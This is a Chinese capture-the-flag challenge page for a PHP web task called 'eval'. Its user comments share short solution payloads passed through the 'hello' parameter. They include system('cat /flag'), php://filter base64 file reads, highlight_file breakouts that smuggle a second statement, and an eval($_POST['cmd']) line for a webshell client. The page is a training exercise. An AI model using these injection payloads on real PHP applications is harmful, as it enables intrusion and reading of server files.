evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 18663
提  示:
描  述:
eval
评论
chm 1月前

http://171.80.2.169:19841/?hello=file(%22flag.php%22)

回复 1

yiya咿呀 2月前

url/?hello=eval(system('cat /flag'))

回复 0

道法自然 2月前

蚁剑直接 url/?hello=eval($_POST['cmd')

回复 0

1nfinix 2月前

构造payload: ?hello=);highlight_file('flag.php');// 或者 ?hello=);system('cat flag.php');//

回复 0

lins11 2月前

/?hello=file_get_contents(%27php://filter/read=convert.base64-encode/resource=flag.php%27) ->base64解码

回复 0

叱咤月海鱼鱼猫 3月前

?hello=highlight_file('flag.php')

回复 1

banfang 4月前

点击场景后将代码发送给豆包等一分钟基本上就可以了

回复 0

pks0 4月前

?hello=1);highlight_file(%27flag.php%27);//

回复 1

一个姓⎝李⎠的师傅~ 6月前

知其然,不知其所以然,以后还是不会类似的题目:(下面是我写了 1 天的思路,保证你看完以后一切都明白了!!!) https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#fYY9d

回复 10
pipipikaqiu 3月前

写的好详细,太好了啊

回复 1

一个姓⎝李⎠的师傅~ 3月前

@想好思路再支付 有帮助就好,感谢老铁的认可!!!

回复 1

想好思路再支付 3月前

思路讲的真好啊李师傅

回复 1

ubudj 6月前

?hello=file(%27flag.php%27) ,%27 是单引号(')的 URL 编码形式。 确保 file() 函数能正确识别要读取的文件名

回复 1

WriteUp

image
harry

1 金币

评分(10)

解题动态

穹空丶悠远 攻破了该题 1天前
demonslayer 攻破了该题 1天前
拾柒x 攻破了该题 1天前
CD123456 攻破了该题 1天前
寒夜清风 攻破了该题 2天前
xi24 攻破了该题 2天前
4n4n4n4n 攻破了该题 4天前
bmdz0516 攻破了该题 4天前
18171382569 攻破了该题 4天前
无聊至极的香蕉 攻破了该题 4天前
jiandandian 攻破了该题 5天前
雨季小朋友 攻破了该题 5天前
十里故清云 攻破了该题 6天前
qq1002517 攻破了该题 6天前
YDG777 攻破了该题 7天前
gclome 攻破了该题 7天前
麻辣鸽子头 攻破了该题 7天前
潭影空人心 攻破了该题 7天前
2523822945 攻破了该题 7天前
minakuu 攻破了该题 7天前
问题反馈